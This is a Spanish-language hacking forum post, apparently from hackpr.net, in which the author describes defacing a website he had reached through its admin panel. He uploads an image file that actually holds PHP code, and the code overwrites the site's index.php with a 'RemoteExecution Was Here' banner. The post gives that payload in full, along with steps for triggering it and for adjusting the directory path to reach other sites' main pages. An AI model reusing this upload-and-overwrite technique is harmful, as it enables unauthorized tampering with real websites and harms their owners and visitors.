bueno esto es algo sencillo me acaba de pasar queria defacear una web y no le podia dar al index principal..intente subir shell en .php.jpg pero tenia funciones desactivadads...entonces el execute no andaba...
(https://hackpr.net/foro/proxy.php?request=http%3A%2F%2Fxs434.xs.to%2Fxs434%2F08524%2Ftutore852.jpg&hash=6b3888aaf945223f007c61971dde1796b8e3c546)
entonces fui de nuevo al panel de admin y subi una imagen nueva..
(https://hackpr.net/foro/proxy.php?request=http%3A%2F%2Fxs434.xs.to%2Fxs434%2F08524%2Ffopen2772.jpg&hash=24c2aa250e4b38a019f15fbd953371c68686ad38)
que hice con el notepad XD y su contenido era
<?php$fp = fopen("../index.php", "w");$string = "\n<center> <h1>RemoteExecution Was Here</h1><br>http://foro.remoteexecution.com</center>";$write = fputs($fp, $string);fclose($fp);?>
entonces una vez subida me kedo revisar el link de la imagen...
y despues ir al index principal y apretar el f5
(https://hackpr.net/foro/proxy.php?request=http%3A%2F%2Fxs434.xs.to%2Fxs434%2F08524%2Ffopen3754.jpg&hash=10c3d1ed8d0329749cbd80101ac625fbeb234a93)
PD: aclaro que en la linea ke dice $fp = fopen("../index.php", "w"); ustedes deben poner la cantidad de directorios que tienen que retroceder para darle al proncipal en este caso solo 1